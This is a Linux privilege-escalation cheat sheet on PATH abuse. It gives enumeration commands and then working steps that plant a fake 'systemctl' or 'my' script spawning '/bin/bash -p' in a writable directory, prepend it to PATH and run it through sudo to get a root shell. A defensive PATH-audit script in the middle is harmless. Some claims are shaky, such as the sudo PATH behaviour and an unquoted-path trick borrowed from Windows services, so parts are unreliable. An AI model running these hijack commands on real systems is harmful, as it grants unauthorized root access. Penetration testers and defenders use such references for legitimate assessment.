Path Abuse
Path abuse occurs when a misconfigured $PATH environment variable or unquoted paths in scripts/services allow an attacker to execute unintended binaries with elevated privileges.
How To?
- Check PATH for writable directories
    echo $PATH    # List PATH directories
    find $(echo "$PATH" | tr ':' ' ') -maxdepth 0 -type d -writable 2>/dev/null    # Find writable dirs (PATH entries only, no recursion)
- Look for commands run as root (Sudo/SUID scripts/services)
    sudo -l    # Check sudo permissions
    find / -perm -4000 -type f 2>/dev/null    # Find SUID binaries
- Exploit Unquoted Service Paths (If a script runs with root privileges)
    systemctl list-unit-files --type=service --state=enabled    # Find enabled services
    cat /etc/systemd/system/<service>.service    # Check ExecStart path
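The PATH check above, written as a defender-side audit (an added example, not part of the original page). It goes beyond the one-liner by also flagging empty and relative entries and missing directories that someone else could create; the function names `audit_path` and `is_loose` and the finding labels are assumptions of this example.

```bash
#!/bin/sh
# Audit a PATH-style string for entries that would let a non-root user
# plant a binary ahead of the real one. Prints "FINDING<TAB>entry" lines.

# True if the directory is group- or world-writable by mode bits,
# or writable by the invoking user when that user is not root.
is_loose() {
    [ -n "$(find -L "$1" -maxdepth 0 \( -perm -0002 -o -perm -0020 \) 2>/dev/null)" ] && return 0
    [ "$(id -u)" -ne 0 ] && [ -w "$1" ]
}

audit_path() {
    rest="$1:"                     # trailing ':' so the loop also sees the last entry
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"          # next entry
        rest="${rest#*:}"          # remainder of the string
        case "$dir" in
            "") printf 'EMPTY\t(current directory)\n'; continue ;;  # '' means cwd
            /*) ;;                                                  # absolute: keep checking
            *)  printf 'RELATIVE\t%s\n' "$dir"; continue ;;
        esac
        if [ ! -d "$dir" ]; then
            # A missing entry matters only if someone else can create it.
            parent=$(dirname "$dir")
            [ -d "$parent" ] && is_loose "$parent" && printf 'CREATABLE\t%s\n' "$dir"
            continue
        fi
        is_loose "$dir" && printf 'WRITABLE\t%s\n' "$dir"
    done
    return 0
}

# Audit the PATH of the current shell.
audit_path "$PATH"
```

Run it against the PATH that privileged contexts actually use as well, such as the `secure_path` value in sudoers and any `Environment=PATH=` set in a service unit.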
Hijack Path Execution
- Create a malicious binary/script in a writable PATH directory
    echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/systemctl
    chmod +x /tmp/systemctl
    export PATH="/tmp:$PATH"
    sudo systemctl restart <target_service>
- If unquoted paths exist (e.g., /usr/local/bin/my script.sh), create a binary named my in /usr/local/bin
    echo -e '#!/bin/bash\n/bin/bash -p' > "/usr/local/bin/my"
    chmod +x "/usr/local/bin/my"
    sudo /usr/local/bin/my\ script.sh